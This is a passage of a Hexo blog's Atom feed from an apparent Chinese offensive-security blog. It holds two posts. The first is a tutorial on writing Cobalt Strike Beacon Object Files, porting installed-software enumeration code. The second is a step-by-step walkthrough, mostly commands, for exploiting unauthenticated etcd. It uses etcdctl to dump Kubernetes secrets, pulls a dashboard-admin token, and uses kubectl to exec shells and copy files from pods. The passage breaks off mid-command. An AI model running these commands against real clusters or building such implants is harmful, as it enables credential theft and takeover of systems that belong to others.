-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathatom.xml
418 lines (207 loc) · 242 KB
/
atom.xml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
<title>Hexo</title>
<link href="https://oceansec.github.io/atom.xml" rel="self"/>
<link href="https://oceansec.github.io/"/>
<updated>2024-01-02T07:59:17.324Z</updated>
<id>https://oceansec.github.io/</id>
<author>
<name>John Doe</name>
</author>
<generator uri="https://hexo.io/">Hexo</generator>
<entry>
<title>CS BOF文件编写/改写</title>
<link href="https://oceansec.github.io/2024/01/02/BOF%E6%96%87%E4%BB%B6%E7%BC%96%E5%86%99-%E6%94%B9%E5%86%99/"/>
<id>https://oceansec.github.io/2024/01/02/BOF%E6%96%87%E4%BB%B6%E7%BC%96%E5%86%99-%E6%94%B9%E5%86%99/</id>
<published>2024-01-02T07:55:21.000Z</published>
<updated>2024-01-02T07:59:17.324Z</updated>
<content type="html"><![CDATA[<p>Beacon Object File(BOF) cs 4.1后添加的新功能,</p><blockquote><p>Beacon在接收执行obj前,Cobalt Strike会先对这个obj文件进行一些处理,比如解析obj文件中一些需要的段.text,.data,在处理一些表比如IMAGE_RELOCATION,IMAGE_SYMBOL等等,然后在经过一系列的处理后,会把需要的部分按照一定格式打包起来随后在发送给Beacon,这时Beacon接收到的是Cobalt Strike已经解析处理过的obj文件数据,并非是原本的obj文件,所以Beacon主要做的是必须是在进程内才能确定并完成的事情比如处理重定位,填充函数指针等等,最后去执行go入口点</p></blockquote><p>obj 目标文件就是源代码编译之后但是未进行链接的那些中间文件(Windows 下的 .obj 和 Linux 下的 .o,本文主要指windows 下的 obj )</p><h2 id="使用BOF框架开发"><a href="#使用BOF框架开发" class="headerlink" title="使用BOF框架开发"></a>使用BOF框架开发</h2><p>很多大佬在 GitHub 发了一些模板,可以去参照</p><ul><li>bof的visual studio模板:<a href="https://github.com/securifybv/Visual-Studio-BOF-template">https://github.com/securifybv/Visual-Studio-BOF-template</a></li><li>bof所需的头文件:<a href="https://github.com/trustedsec/CS-Situational-Awareness-BOF">https://github.com/trustedsec/CS-Situational-Awareness-BOF</a></li><li>整理好的,通过DLL名称将WindowsApi函数进行了归类:<a href="https://github.com/evilashz/Visual-Studio-BOF-template">https://github.com/evilashz/Visual-Studio-BOF-template</a></li></ul><p>将下载的模板文件解压至visualstudio的模板目录(<code>%UserProfile%\Documents\Visual Studio 2022\Templates\ProjectTemplates</code>),随后重启VisualStuido</p><p><img src="/2024/01/02/BOF%E6%96%87%E4%BB%B6%E7%BC%96%E5%86%99-%E6%94%B9%E5%86%99/image-20240102103237373.png" alt="image-20240102103237373"></p><p>在创建项目时选择类型为<code>Beacon Object File</code>的项目</p><p><img src="/2024/01/02/BOF%E6%96%87%E4%BB%B6%E7%BC%96%E5%86%99-%E6%94%B9%E5%86%99/image-20240102103310526.png" alt="image-20240102103310526"></p><p>在头文件列表可以看到<code>beacon.h</code>和<code>bofdefs.h</code></p><p><img src="/2024/01/02/BOF%E6%96%87%E4%BB%B6%E7%BC%96%E5%86%99-%E6%94%B9%E5%86%99/image-20240102103350426.png" alt="image-20240102103350426"></p><p>build->batch build 打开项目的 Batch 生成,勾选上 BOF 配置</p><p><img src="/2024/01/02/BOF%E6%96%87%E4%BB%B6%E7%BC%96%E5%86%99-%E6%94%B9%E5%86%99/image-20240102103506658.png" alt="image-20240102103506658"></p><p>配置管理器的编译环境也需设置为BOF</p><p><img src="/2024/01/02/BOF%E6%96%87%E4%BB%B6%E7%BC%96%E5%86%99-%E6%94%B9%E5%86%99/image-20240102103532153.png" alt="image-20240102103532153"></p><p>一个简单的 bof 项目,用于实现向控制台输出字符串</p><ul><li>BOF 入口:代码定义了 BOF 的入口函数 go,当你在 Cobalt Strike 中使用 inline-execute 命令加载并执行你的 BOF时,这个函数将被调用。你可以在这个函数中添加你的 BOF 代码</li><li>非 BOF 入口:这部分代码定义了非 BOF 的入口函数 main。当你在非 Cobalt Strike 环境中运行你的代码时,这个函数将被调用。你可以在这个函数中添加你的非 BOF 代码</li></ul><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">"bofdefs.h"</span></span></span><br><span class="line"></span><br><span class="line"><span class="keyword">extern</span> <span class="string">"C"</span> {</span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> BOF</span></span><br><span class="line"><span class="type">void</span> <span class="title function_">go</span><span class="params">(<span class="type">char</span>* buff, <span class="type">int</span> len)</span> {</span><br><span class="line"> BeaconPrintf(CALLBACK_OUTPUT, <span class="string">"Hello, World!"</span>);</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">}</span><br><span class="line"><span class="meta">#<span class="keyword">ifndef</span> BOF</span></span><br><span class="line"></span><br><span class="line"><span class="type">void</span> <span class="title function_">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">char</span>* argv[])</span> {</span><br><span class="line"></span><br><span class="line"> go(<span class="literal">NULL</span>, <span class="number">0</span>);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br></pre></td></tr></table></figure><p>项目生成后会生成一个<code>.obj</code>文件,也就是编译未链接的目标文件,在CobaltStrike中你可以使用<code>inline-execute</code>命令来加载并执行你的.obj文件,此命令将你的 <code>.obj</code> 文件加载到 Beacon 的内存中,然后调用你的 <code>go</code> 函数,命令格式如下所示</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">beacon> inline-execute your_bof.obj</span><br></pre></td></tr></table></figure><p><img src="/2024/01/02/BOF%E6%96%87%E4%BB%B6%E7%BC%96%E5%86%99-%E6%94%B9%E5%86%99/image-20240102145032414.png" alt="image-20240102145032414"></p><h2 id="修改为BOF格式"><a href="#修改为BOF格式" class="headerlink" title="修改为BOF格式"></a>修改为BOF格式</h2><p>在原有利用代码基础上修改为 BOF 代码步骤</p><ol><li>引入 beacon.h 头文件,beacon.h 定义了与 Cobalt Strike Beacon 交互所需要的各种数据类型和函数</li><li>把所有字符串和函数改成 ascii 的</li><li>把所有函数改成 beacon.h 定义的编写约定</li><li>入口函数由 main 修改为 go</li><li>生成 bof 文件</li></ol><p>将 <a href="https://idiotc4t.com/persistence/get-computer-installed-software">get-computer-installed-software</a> 修改为 bof 加载,代码通过查询注册表获取当前机器安装的程序,这种方式仅对完整安装的软件有效,如果是绿色版的软件则只能通过手工或自动化搜索的方式查找,如果是x64位系统则需要对32位程序也进行遍历(x64系统存在注册表重定位)</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string"><stdio.h></span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string"><Windows.h></span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string"><tchar.h></span></span></span><br><span class="line"></span><br><span class="line"><span class="function">BOOL <span class="title">EnumInstalledSoft</span><span class="params">(TCHAR* subKey, TCHAR* subKeyName)</span> </span>{</span><br><span class="line"> HKEY hKey = <span class="literal">NULL</span>;</span><br><span class="line"> HKEY hSubKey = <span class="literal">NULL</span>;</span><br><span class="line"> DWORD dwIndexs = <span class="number">0</span>;</span><br><span class="line"> TCHAR keyName[MAX_PATH] = { <span class="number">0</span> };</span><br><span class="line"> DWORD dwLength = MAX_PATH; <span class="comment">// 修改为合适的长度</span></span><br><span class="line"> TCHAR subKeyValue[MAX_PATH] = { <span class="number">0</span> };</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (<span class="built_in">RegOpenKeyEx</span>(HKEY_LOCAL_MACHINE, subKey, <span class="number">0</span>, KEY_READ, &hKey) == ERROR_SUCCESS)</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">while</span> (<span class="built_in">RegEnumKeyEx</span>(hKey, dwIndexs, keyName, &dwLength, <span class="literal">NULL</span>, <span class="literal">NULL</span>, <span class="literal">NULL</span>, <span class="literal">NULL</span>) == ERROR_SUCCESS)</span><br><span class="line"> {</span><br><span class="line"> <span class="built_in">RegOpenKey</span>(hKey, keyName, &hSubKey);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (<span class="built_in">RegQueryValueEx</span>(hSubKey, subKeyName, <span class="literal">NULL</span>, <span class="literal">NULL</span>, (LPBYTE)subKeyValue, &dwLength) == ERROR_SUCCESS)</span><br><span class="line"> {</span><br><span class="line"> _tprintf(_T(<span class="string">"%s : %s \n"</span>), keyName, subKeyValue);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="built_in">RegCloseKey</span>(hSubKey);</span><br><span class="line"> hSubKey = <span class="literal">NULL</span>;</span><br><span class="line"> ++dwIndexs;</span><br><span class="line"> dwLength = MAX_PATH; <span class="comment">// 重置为合适的长度</span></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="built_in">RegCloseKey</span>(hKey);</span><br><span class="line"> <span class="keyword">return</span> TRUE;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">return</span> FALSE;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="built_in">EnumInstalledSoft</span>((TCHAR*)_T(<span class="string">"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall"</span>), (TCHAR*)_T(<span class="string">"DisplayName"</span>));</span><br><span class="line"> <span class="built_in">EnumInstalledSoft</span>((TCHAR*)_T(<span class="string">"Software\\Classes\\Installer\\Products"</span>), (TCHAR*)_T(<span class="string">"ProductName"</span>));</span><br><span class="line"> <span class="built_in">system</span>(<span class="string">"pause"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>接下来导入 beacon.h 和替换 BOF 约定的写法,函数原型使用 <a href="https://github.com/dtmsecurity/bof_helper">bof_helper</a> 自动化帮我们生成好bof约定的函数原型和写法,如把 GetProcAddress 换成 KERNEL32$GetProcAddress 的写法,这里直接使用工具,同时也需要把输出函数换成 beacon 导出的函数</p><p><strong>BOF 格式代码</strong></p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string"><stdio.h></span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string"><windows.h></span></span></span><br><span class="line"><span class="comment">// 1.添加 beacon.h 头</span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">"beacon.h"</span></span></span><br><span class="line"></span><br><span class="line"><span class="comment">// 2.添加函数引入约定,可以去找找其他项目中有没有使用相同的函数</span></span><br><span class="line">DECLSPEC_IMPORT WINADVAPI LONG WINAPI ADVAPI32$<span class="built_in">RegOpenKeyExA</span>(HKEY, LPCWSTR, DWORD, REGSAM, PHKEY);</span><br><span class="line">DECLSPEC_IMPORT WINADVAPI LONG WINAPI ADVAPI32$<span class="built_in">RegOpenKeyA</span>(HKEY, LPCWSTR, PHKEY);</span><br><span class="line">DECLSPEC_IMPORT WINADVAPI LONG WINAPI ADVAPI32$<span class="built_in">RegCloseKey</span>(HKEY);</span><br><span class="line">DECLSPEC_IMPORT WINADVAPI LONG WINAPI ADVAPI32$<span class="built_in">RegEnumKeyExA</span>(</span><br><span class="line">HKEY,</span><br><span class="line">DWORD,</span><br><span class="line">LPWSTR,</span><br><span class="line">LPDWORD,</span><br><span class="line">LPDWORD,</span><br><span class="line">LPWSTR,</span><br><span class="line">LPDWORD,</span><br><span class="line">PFILETIME</span><br><span class="line">);</span><br><span class="line">DECLSPEC_IMPORT WINADVAPI LONG WINAPI ADVAPI32$<span class="built_in">RegQueryValueExA</span>(</span><br><span class="line">HKEY,</span><br><span class="line">LPCWSTR,</span><br><span class="line">LPDWORD,</span><br><span class="line">LPDWORD,</span><br><span class="line">LPBYTE,</span><br><span class="line">LPDWORD</span><br><span class="line">);</span><br><span class="line"></span><br><span class="line"><span class="function">BOOL <span class="title">EnumInstalledSoft</span><span class="params">(CHAR* subKey, CHAR* subKeyName)</span> </span>{</span><br><span class="line">HKEY hKey = <span class="literal">NULL</span>;</span><br><span class="line">HKEY hSubKey = <span class="literal">NULL</span>;</span><br><span class="line">DWORD dwIndexs = <span class="number">0</span>;</span><br><span class="line">CHAR keyName[MAX_PATH] = { <span class="number">0</span> };</span><br><span class="line">DWORD dwLength = <span class="number">256</span>;</span><br><span class="line">CHAR subKeyValue[MAX_PATH] = { <span class="number">0</span> };</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (ADVAPI32$<span class="built_in">RegOpenKeyExA</span>(HKEY_LOCAL_MACHINE, subKey, <span class="number">0</span>, KEY_READ, &hKey) == ERROR_SUCCESS)</span><br><span class="line">{</span><br><span class="line"><span class="keyword">while</span> (ADVAPI32$<span class="built_in">RegEnumKeyExA</span>(hKey, dwIndexs, keyName, &dwLength, <span class="literal">NULL</span>, <span class="literal">NULL</span>, <span class="literal">NULL</span>, <span class="literal">NULL</span>) == ERROR_SUCCESS)</span><br><span class="line">{</span><br><span class="line">ADVAPI32$<span class="built_in">RegOpenKeyA</span>(hKey, keyName, &hSubKey);</span><br><span class="line">ADVAPI32$<span class="built_in">RegQueryValueExA</span>(hSubKey,</span><br><span class="line">subKeyName,</span><br><span class="line"><span class="literal">NULL</span>,</span><br><span class="line"><span class="literal">NULL</span>,</span><br><span class="line">(LPBYTE)subKeyValue,</span><br><span class="line">&dwLength);</span><br><span class="line"><span class="built_in">BeaconPrintf</span>(CALLBACK_OUTPUT, <span class="string">"%s : %s \n"</span>, keyName, subKeyValue);</span><br><span class="line">ADVAPI32$<span class="built_in">RegCloseKey</span>(hSubKey);</span><br><span class="line">hSubKey = <span class="number">0</span>;</span><br><span class="line">++dwIndexs;</span><br><span class="line">dwLength = <span class="number">256</span>;</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">{</span><br><span class="line"><span class="keyword">return</span> FALSE;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">if</span> (hKey != <span class="literal">NULL</span>)</span><br><span class="line">{</span><br><span class="line">ADVAPI32$<span class="built_in">RegCloseKey</span>(hKey);</span><br><span class="line"><span class="keyword">return</span> TRUE;</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">go</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"><span class="built_in">EnumInstalledSoft</span>((CHAR*)<span class="string">"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall"</span>, (CHAR*)<span class="string">"DisplayName"</span>);</span><br><span class="line"><span class="built_in">EnumInstalledSoft</span>((CHAR*)<span class="string">"Software\\Classes\\Installer\\Products"</span>, (CHAR*)<span class="string">"ProductName"</span>);</span><br><span class="line"><span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>其余的 bof 格式差异</p><ul><li><p>参数传入</p><p>目前代码没有传入参数,如果有参数传入,需要先声明参数</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">go</span><span class="params">(<span class="type">char</span>* args,<span class="type">int</span> length)</span></span>{</span><br><span class="line"> datap parser;</span><br><span class="line"> <span class="type">char</span>* str_arg;</span><br><span class="line"> <span class="type">int</span> num_arg;</span><br><span class="line"> </span><br><span class="line"> str_arg = <span class="built_in">BeaconDataExtract</span>(&parser,<span class="literal">NULL</span>);</span><br><span class="line">}</span><br></pre></td></tr></table></figure></li><li><p>输出</p><p>使用 BeaconPrintf 替换 printf</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">BeaconPrintf</span>(CALLBACK_ERROR,<span class="string">"ERROR"</span>);</span><br></pre></td></tr></table></figure></li></ul><h3 id="编译"><a href="#编译" class="headerlink" title="编译"></a>编译</h3><p>使用 gcc 进行编译,需要提前<a href="https://blog.csdn.net/weixin_64064486/article/details/123940266">安装</a></p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gcc -c 源文件.c -o 输出文件.o</span><br></pre></td></tr></table></figure><p>ps:注意需要安装 64 位的程序,才能编译 64 位的 obj 文件,<a href="https://www.jianshu.com/p/d66c2f2e3537">MinGW-w64安装教程</a></p><p>inline-execute 在 cs 中直接使用 bof 文件</p><h3 id="bof-缺点"><a href="#bof-缺点" class="headerlink" title="bof 缺点"></a><strong>bof 缺点</strong></h3><ol><li>似乎无法使用初始化为0的全局变量</li><li>不太适合跑驻留型的任务,跑大量循环会崩溃</li><li>一旦引发崩溃整个beacon就会崩掉</li><li>不易调试</li><li>似乎输出不能使用unicode</li></ol><p>参考文章</p><ul><li><a href="https://wbglil.gitbook.io/cobalt-strike/cobalt-strike-yuan-li-jie-shao/untitled-3">Beacon Object File(BOF实现原理)</a></li><li><a href="https://blog.csdn.net/xf555er/article/details/132416469">内网渗透神器CobaltStrike之BOF编写(十一)</a></li><li><a href="https://tttang.com/archive/1786/#toc_0x08-execuate-assembly">Cobalt Strike BOF原理分析</a></li></ul>]]></content>
<summary type="html"><p>Beacon Object File(BOF) cs 4.1后添加的新功能,</p>
<blockquote>
<p>Beacon在接收执行obj前,Cobalt Strike会先对这个obj文件进行一些处理,比如解析obj文件中一些需要的段.text,.data,在处理一</summary>
</entry>
<entry>
<title>etcd未授权到控制k8s集群</title>
<link href="https://oceansec.github.io/2023/12/27/etcd%E6%9C%AA%E6%8E%88%E6%9D%83%E5%88%B0%E6%8E%A7%E5%88%B6k8s%E9%9B%86%E7%BE%A4/"/>
<id>https://oceansec.github.io/2023/12/27/etcd%E6%9C%AA%E6%8E%88%E6%9D%83%E5%88%B0%E6%8E%A7%E5%88%B6k8s%E9%9B%86%E7%BE%A4/</id>
<published>2023-12-27T01:03:48.375Z</published>
<updated>2023-12-27T01:17:33.642Z</updated>
<content type="html"><![CDATA[<p>在安装完 K8s 后,默认会安装 etcd 组件,etcd 是一个高可用的 key-value 数据库,它为 k8s 集群提供底层数据存储,保存了整个集群的状态。大多数情形下,数据库中的内容没有加密,因此如果黑客拿下 etcd,就意味着能控制整个 K8s 集群。</p><p><strong>etcd 未授权访问</strong></p><p>如果目标在启动 etcd 的时候没有开启证书认证选项,且 2379 端口直接对外开放的话,则存在 etcd 未授权访问漏洞。</p><p>访问目标的 <a href="https://ip:2379/version">https://IP:2379/version</a> 或 <a href="https://ip:2379/v2/keys%EF%BC%8C%E7%9C%8B%E7%9C%8B%E6%98%AF%E5%90%A6%E5%AD%98%E5%9C%A8%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E3%80%82%E5%A6%82%E6%9E%9C%E6%98%BE%E7%A4%BA%E5%A6%82%E4%B8%8B%EF%BC%8C%E5%88%99%E8%AF%81%E6%98%8E%E5%AD%98%E5%9C%A8%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E3%80%82">https://IP:2379/v2/keys,看看是否存在未授权访问。如果显示如下,则证明存在未授权访问。</a></p><p><img src="/2023/12/27/etcd%E6%9C%AA%E6%8E%88%E6%9D%83%E5%88%B0%E6%8E%A7%E5%88%B6k8s%E9%9B%86%E7%BE%A4/image-20231222085653333.png" alt="image-20231222085653333"></p><h3 id="1-查找token"><a href="#1-查找token" class="headerlink" title="1.查找token"></a>1.查找token</h3><p>需要使用到 etcd 命令行连接工具:<a href="https://etcd.io/docs/v3.4/install/">etcdctl</a></p><p>由于 Service Account 关联了一套凭证,存储在 Secret 中。因此我们可以过滤 Secret,查找具有高权限的 Secret,然后获得其 token 接管 K8s 集群</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#查找所有的secret</span></span><br><span class="line">ETCDCTL_API=3 ./etcdctl --insecure-transport=<span class="literal">false</span> --insecure-skip-tls-verify --endpoints=https://172.16.200.70:2379/ get / --prefix --keys-only|<span class="built_in">sort</span>|<span class="built_in">uniq</span>| grep secret</span><br></pre></td></tr></table></figure><p><img src="/2023/12/27/etcd%E6%9C%AA%E6%8E%88%E6%9D%83%E5%88%B0%E6%8E%A7%E5%88%B6k8s%E9%9B%86%E7%BE%A4/image-20231222090234172.png" alt="image-20231222090234172"></p><p>从返回的数据中挑选出一个具有高权限的 role 并读取其 token,以 /registry/secrets/kube-system/dashboard-admin-token-c7spp 为例,其中 kube-system 代表 namespace、dashboard-admin 是 clusterrole</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#查找指定secret保存的证书和token</span></span><br><span class="line">ETCDCTL_API=3 ./etcdctl --insecure-transport=<span class="literal">false</span> --insecure-skip-tls-verify --endpoints=https://172.16.200.70:2379/ get /registry/secrets/kube-system/dashboard-admin-token-c7spp</span><br></pre></td></tr></table></figure><p><img src="/2023/12/27/etcd%E6%9C%AA%E6%8E%88%E6%9D%83%E5%88%B0%E6%8E%A7%E5%88%B6k8s%E9%9B%86%E7%BE%A4/image-20231222090606284.png" alt="image-20231222090606284"></p><p>复制 token,最后的 token 为 token? 和 #kubernetes.io/service-account-token 之间的部分</p><p><img src="/2023/12/27/etcd%E6%9C%AA%E6%8E%88%E6%9D%83%E5%88%B0%E6%8E%A7%E5%88%B6k8s%E9%9B%86%E7%BE%A4/image-20231222112025096.png" alt="image-20231222112025096"></p><p>如果机器上安装了 KubeOperator 存在弱口令,登录之后可以在集群中获取管控 token</p><p><img src="/2023/12/27/etcd%E6%9C%AA%E6%8E%88%E6%9D%83%E5%88%B0%E6%8E%A7%E5%88%B6k8s%E9%9B%86%E7%BE%A4/image-20231222113634553.png" alt="image-20231222113634553"></p><p>如果不知道 server api 可以通过 webkubectl 获取</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">kubectl cluster-info</span><br></pre></td></tr></table></figure><p><img src="/2023/12/27/etcd%E6%9C%AA%E6%8E%88%E6%9D%83%E5%88%B0%E6%8E%A7%E5%88%B6k8s%E9%9B%86%E7%BE%A4/image-20231222113822617.png" alt="image-20231222113822617"></p><h3 id="2-验证token有效性"><a href="#2-验证token有效性" class="headerlink" title="2.验证token有效性"></a>2.验证token有效性</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl --header <span class="string">"Authorization: Token"</span> -X GET https://172.16.200.70:6443/api -k</span><br></pre></td></tr></table></figure><h3 id="3-使用-kebuctl-去执行命令"><a href="#3-使用-kebuctl-去执行命令" class="headerlink" title="3.使用 kebuctl 去执行命令"></a>3.使用 kebuctl 去执行命令</h3><p>这里直接指定 token 去执行命令,或者可以通过制作配置文件指定配置文件来执行但是比较复杂</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">kubectl --insecure-skip-tls-verify -s https://127.0.0.1:6443/ --token=<span class="string">"[ey...]"</span> -n kube-system get pods</span><br></pre></td></tr></table></figure><p><img src="/2023/12/27/etcd%E6%9C%AA%E6%8E%88%E6%9D%83%E5%88%B0%E6%8E%A7%E5%88%B6k8s%E9%9B%86%E7%BE%A4/image-20231222112738092.png" alt="image-20231222112738092"></p><p>kebuctl 常用命令</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 查看所有的资源信息</span></span><br><span class="line">kubectl get all</span><br><span class="line">kubectl get --all-namespaces</span><br><span class="line"><span class="comment"># 获取pods列表</span></span><br><span class="line">kubectl get pods -o wide --all-namespaces</span><br><span class="line">-n 指定命令空间</span><br><span class="line">-o wide 展示详细信息</span><br><span class="line"><span class="comment"># 执行命令</span></span><br><span class="line">kubectl <span class="built_in">exec</span> -it podsname -n namespace -- <span class="built_in">command</span></span><br><span class="line">-- bash 进入 shell</span><br><span class="line"><span class="comment"># 下载文件</span></span><br><span class="line">kubectl <span class="built_in">cp</span> -n 命名空间 pod名字:/data/1.hprof(在pod中要下载文件的路径) 